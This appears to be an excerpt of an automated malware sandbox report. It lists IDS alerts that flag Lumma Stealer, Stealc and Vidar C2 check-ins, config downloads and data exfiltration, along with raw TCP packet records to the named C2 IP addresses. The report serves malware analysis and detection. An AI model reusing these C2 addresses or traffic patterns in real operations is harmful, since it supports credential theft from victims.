                                                                                                                                                                                                                                          2024-10-02T14:43:27.648630+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config149.12.197.9443192.168.2.658535TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:28.262517+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.658538104.21.17.174443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:28.262517+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.658538104.21.17.174443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:28.336885+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65853949.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:29.047007+02002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1149.12.197.9443192.168.2.658539TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:29.831403+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65854249.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:30.681564+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.658543104.21.16.12443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:30.681564+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.658543104.21.16.12443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:30.839422+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65854449.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:33.919258+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65854549.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:35.049419+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65854649.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:36.154713+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65854749.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:37.649493+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65854849.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:39.381876+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65854949.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:41.333638+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65855149.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:42.854596+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65855249.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:44.328521+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65855349.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:46.069067+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65855449.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:49.012798+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65855549.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:50.646052+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65855649.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:51.953225+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65855749.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:53.623999+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65855849.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:55.913375+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65856049.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:58.252697+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65856549.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:58.299325+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.658528104.26.12.20580TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:59.507617+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.658528104.26.12.20580TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:59.893298+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.658568147.45.44.10480TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:01.167408+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65857149.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:03.114778+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.658573172.67.208.141443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:03.114778+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.658573172.67.208.141443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:03.511798+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65857449.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:04.230142+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.658575188.114.97.3443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:04.230142+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.658575188.114.97.3443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:05.356373+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.658576104.21.56.150443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:05.356373+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.658576104.21.56.150443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:06.702953+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.658577172.67.184.196443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:06.702953+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.658577172.67.184.196443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:06.703468+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65857849.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:08.626474+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.658579104.21.18.193443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:08.626474+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.658579104.21.18.193443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:08.802521+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65858149.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:09.082576+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.65858046.8.231.10980TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:09.279456+02002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.65858046.8.231.10980TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:09.330593+02002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config146.8.231.10980192.168.2.658580TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:09.504186+02002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.65858046.8.231.10980TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:09.653035+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.658582172.67.195.67443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:09.653035+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.658582172.67.195.67443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:09.921297+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config146.8.231.10980192.168.2.658580TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:10.424557+02002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.65858046.8.231.10980TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:10.604642+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.65858046.8.231.10980TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:10.960379+02002054495ET MALWARE Vidar Stealer Form Exfil1192.168.2.65858445.132.206.25180TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:11.020278+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.658583104.21.17.174443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:11.020278+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.658583104.21.17.174443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:13.698145+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.65858046.8.231.10980TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:14.413954+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65858749.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:14.618861+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.65858046.8.231.10980TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:15.317179+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.65858846.8.231.10980TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:15.702613+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65858949.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:15.965488+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.65858846.8.231.10980TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:16.610197+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.65859046.8.231.10980TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:17.058405+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65859149.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:17.809207+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.65859046.8.231.10980TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:18.714019+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65859249.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:19.412031+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config149.12.197.9443192.168.2.658592TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:19.792937+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.658593147.45.44.10480TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:20.158914+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65859449.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:21.107891+02002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1149.12.197.9443192.168.2.658594TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:24.861948+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.658595172.67.208.141443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:24.861948+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.658595172.67.208.141443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:25.001804+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65859749.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:26.018339+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65859849.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:26.463660+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.658599188.114.97.3443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:26.463660+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.658599188.114.97.3443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:27.461947+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.658600104.21.56.150443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:27.461947+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.658600104.21.56.150443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:29.905746+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65860249.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:29.947201+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.658601172.67.184.196443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:29.947201+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.658601172.67.184.196443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:31.112798+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.658605104.21.18.193443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:31.112798+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.658605104.21.18.193443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:32.007714+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.658608104.26.12.20580TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:32.131546+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.658607172.67.195.67443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:32.131546+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.658607172.67.195.67443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:33.135375+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.658611104.21.17.174443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:33.135375+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.658611104.21.17.174443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:35.668995+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.658617104.21.16.12443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:35.668995+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.658617104.21.16.12443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:44.631461+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65862049.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:44.663437+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65862149.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:45.947908+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65862249.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:45.948384+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65862349.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:47.296767+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65862549.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:47.297352+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65862449.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:48.682695+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65862949.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:48.685174+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65862849.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:49.377395+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config149.12.197.9443192.168.2.658629TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:49.385945+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config149.12.197.9443192.168.2.658628TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:50.055117+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65863349.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:50.056338+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65863249.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:50.747083+02002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1149.12.197.9443192.168.2.658633TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:50.749556+02002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1149.12.197.9443192.168.2.658632TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:51.467694+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65863549.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:51.526239+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65863649.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:52.474518+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65863849.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:52.530306+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65863949.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:53.882992+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.658641104.26.12.20580TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:56.449692+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65864549.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:56.464935+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65864649.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:57.128378+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65864749.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:44:57.498056+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65864849.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:45:01.383158+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.658649104.26.12.20580TCP
                                                                                                                                                                                                                                          2024-10-02T14:45:13.507905+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.658668104.26.12.20580TCP
                                                                                                                                                                                                                                          2024-10-02T14:45:31.992324+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.658685104.26.12.20580TCP
                                                                                                                                                                                                                                          2024-10-02T14:45:36.289243+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.658689104.26.12.20580TCP
                                                                                                                                                                                                                                          2024-10-02T14:46:17.898735+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.658721104.26.12.20580TCP
                                                                                                                                                                                                                                          2024-10-02T14:46:22.883133+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.658727104.26.12.20580TCP
                                                                                                                                                                                                                                          2024-10-02T14:46:24.826103+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.658730104.26.12.20580TCP
                                                                                                                                                                                                                                          2024-10-02T14:46:26.211283+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.658734104.26.13.20580TCP
                                                                                                                                                                                                                                          2024-10-02T14:47:00.289543+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.658765104.26.13.20580TCP
                                                                                                                                                                                                                                          2024-10-02T14:47:01.633315+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.658767104.26.13.20580TCP
                                                                                                                                                                                                                                          2024-10-02T14:47:02.148938+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.658769104.26.13.20580TCP

                                                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:45.247087955 CEST4970880192.168.2.6104.26.12.205
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:45.252455950 CEST8049708104.26.12.205192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:45.252557039 CEST4970880192.168.2.6104.26.12.205
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:45.253235102 CEST4970880192.168.2.6104.26.12.205
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:45.258146048 CEST8049708104.26.12.205192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:45.715502977 CEST8049708104.26.12.205192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:45.759196997 CEST4970880192.168.2.6104.26.12.205
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:45.892251015 CEST49709443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:45.892297029 CEST44349709172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:45.892946959 CEST49709443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:45.965888977 CEST49709443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:45.965919018 CEST44349709172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:46.469333887 CEST44349709172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:46.469903946 CEST49709443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:46.473902941 CEST49709443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:46.473948002 CEST44349709172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:46.474179983 CEST44349709172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:46.522973061 CEST49709443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:46.531060934 CEST49709443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:46.571412086 CEST44349709172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:46.626015902 CEST44349709172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:46.631406069 CEST49709443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:46.631432056 CEST44349709172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:47.063472033 CEST44349709172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:47.063558102 CEST44349709172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:47.063612938 CEST49709443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:47.067404032 CEST49709443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:47.072877884 CEST4970880192.168.2.6104.26.12.205
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:47.077862978 CEST8049708104.26.12.205192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:47.177329063 CEST8049708104.26.12.205192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:47.179406881 CEST49710443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:47.179456949 CEST44349710172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:47.179604053 CEST49710443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:47.181898117 CEST49710443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:47.181922913 CEST44349710172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:47.226016998 CEST4970880192.168.2.6104.26.12.205
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:47.666340113 CEST44349710172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:47.672540903 CEST49710443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:47.672550917 CEST44349710172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:47.820683956 CEST44349710172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:47.821060896 CEST49710443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:47.821075916 CEST44349710172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.262082100 CEST44349710172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.262190104 CEST44349710172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.262278080 CEST49710443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.265569925 CEST49710443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.276675940 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.281702042 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.281778097 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.282007933 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.286864996 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961133957 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961149931 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961164951 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961210012 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961283922 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961296082 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961306095 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961316109 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961327076 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961338997 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961368084 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961529970 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961540937 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961584091 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.966021061 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.966061115 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.966129065 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.112957954 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.112988949 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.113002062 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.113014936 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.113028049 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.113039017 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.113094091 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.113234997 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.113287926 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.113321066 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.113334894 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.113373041 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.113389969 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.113403082 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.113445044 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.114118099 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.114197016 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.114207983 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.114229918 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.114300966 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.114320993 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.114351034 CEST4971180192.168.2.6147.45.44.104
